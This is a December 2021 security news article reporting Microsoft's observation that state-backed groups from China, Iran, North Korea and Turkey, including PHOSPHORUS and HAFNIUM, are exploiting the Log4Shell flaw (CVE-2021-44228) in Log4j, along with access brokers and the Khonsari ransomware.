16 December 2021

Microsoft: State-sponsored hackers from China, Iran, North Korea and Turkey target the Log4Shell bug


Microsoft: State-sponsored hackers from China, Iran, North Korea and Turkey target the Log4Shell bug

State-sponsored hacker groups from China, Iran, North Korea and Turkey have been spotted exploiting the recently disclosed CVE-2021-44228 vulnerability (aka “Log4Shell”) in the Log4j logging utility to gain access to enterprise networks.

CVE-2021-44228 is a remote code injection vulnerability, which exists due to improper input validation when processing LDAP requests and could be abused by threat actors to hijack servers and apps over the internet. The disclosure of the flaw caused a widespread alarm because Log4j is widely used in commonly deployed enterprise systems. The flaw affects all versions of Log4j from 2.0-beta9 (released in September 2013) to 2.14.1 (March 2021).

This week, the Apache Software Foundation (ASF) released a new fix for the Log4j logging utility after it was found that the previous patch “was incomplete in certain non-default configurations.”

As Microsoft noted in an update on its Log4Shell guidance blog post, “this activity ranges from experimentation during development, integration of the vulnerability to in-the-wild payload deployment, and exploitation against targets to achieve the actor’s objectives.”

Threat actors linked to the Log4Shell attacks include the Iran-linked APT group known as PHOSPHORUS, and HAFNIUM, a state-backed hacker group believed to have ties to the Chinese government. Microsoft did not name the threat groups operating out of North Korea and Turkey.

“MSTIC has observed PHOSPHORUS, an Iranian actor that has been deploying ransomware, acquiring and making modifications of the Log4j exploit. We assess that PHOSPHORUS has operationalized these modifications,” the tech giant noted.

As for HAFNIUM, the group has been observed abusing the flaw to attack virtualization infrastructure.

“In these attacks, HAFNIUM-associated systems were observed using a DNS service typically associated with testing activity to fingerprint systems,” Microsoft said.

Furthermore, multiple groups acting acting as access brokers have also been observed leveraging Log4Shell to gain initial access to target networks. These access brokers then sell access to these networks to ransomware-as-a-service affiliates. Exploitation attempts were observed on both Windows and Linux systems, Microsoft said.

On Monday, security firm Bitdefender warned of a first ransomware group leveraging the Log4Shell flaw to deploy a new ransomware strain called “Khonsari” on unpatched systems.

Back to the list

Latest Posts

The story of the four bears: Brief analysis of APT groups linked to the Russian government

The story of the four bears: Brief analysis of APT groups linked to the Russian government

In “The Four Bears” series we will tell you about the APT groups known as Fancy Bear, Cozy Bear, Voodoo Bear, and Berserk Bear.
17 January 2022
Cybersecurity year in review: Most notable APT hacks of 2021

Cybersecurity year in review: Most notable APT hacks of 2021

In 2021 nation-state actors somewhat faded into the background, but they still pose a significant threat.
17 January 2022
Hackers put up for sale data of 2M ONUS customers after the company refused to pay $5 million ransom

Hackers put up for sale data of 2M ONUS customers after the company refused to pay $5 million ransom

The attackers exploited the Log4Shell vulnerability on ONUS’ Cyclos server to plant backdoor and exfiltrate data.
30 December 2021